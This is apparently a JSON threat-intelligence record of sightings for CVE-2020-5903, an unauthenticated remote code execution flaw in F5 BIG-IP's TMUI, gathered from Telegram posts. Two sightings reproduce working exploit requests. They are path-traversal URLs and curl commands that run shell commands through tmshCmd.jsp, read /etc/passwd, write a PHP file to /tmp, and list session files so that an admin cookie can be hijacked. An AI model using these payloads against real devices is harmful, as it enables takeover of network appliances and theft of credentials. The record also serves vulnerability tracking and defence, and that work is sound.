{"vulnerability": "cve-2020-5903", "sightings": [{"uuid": "0227573c-0d81-4f0a-b7d8-61aa53db511b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5903", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1145", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Exploit code for F5's BIG-IP; TMUI Unauthenticated RCE vulnerability via HTTP GET requests | CVE-2020-5903\n\n\u25aa\ufe0eCode Execution\nhttps://\u300aIP\u300b/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami\n\n\u25aa\ufe0eLFI\nhttps://\u300aIP\u300b/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n\n\u25aa\ufe0eFile Write\nhttps://\u300aIP\u300b/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd.php&content=thisisgood", "creation_timestamp": "2020-07-06T11:05:19.000000Z"}, {"uuid": "189074cd-07f9-480b-9508-789b79c47b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5903", "type": "seen", "source": "https://t.me/cKure/1106", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 F5's BIG-IP Allow Full System Compromise; TMUI Unauthenticated RCE vulnerability | CVE-2020-5903\n\nhttps://support.f5.com/csp/article/K52145254", "creation_timestamp": "2020-07-03T17:08:12.000000Z"}, {"uuid": "2667699b-3911-44ed-9851-2e99592c0310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5903", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1378", "content": "#exploit\nF5 BigIP TMUI Critical RCE (CVE-2020-5902, CVE-2020-5903):\nhttps://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/\n]-> PoCs:\n1. https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4\n2. [https://{host}]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp \nthere you will see the session files like: \"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX\". \nSet this in the cookie and you are in admin's session...\n3. RCE\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n4. Read File\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'\n]-> Security Advisory:\nhttps://support.f5.com/csp/article/K52145254\n]-> A\u00a0quick NMAP script:\nhttps://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse", "creation_timestamp": "2024-11-02T15:23:24.000000Z"}]}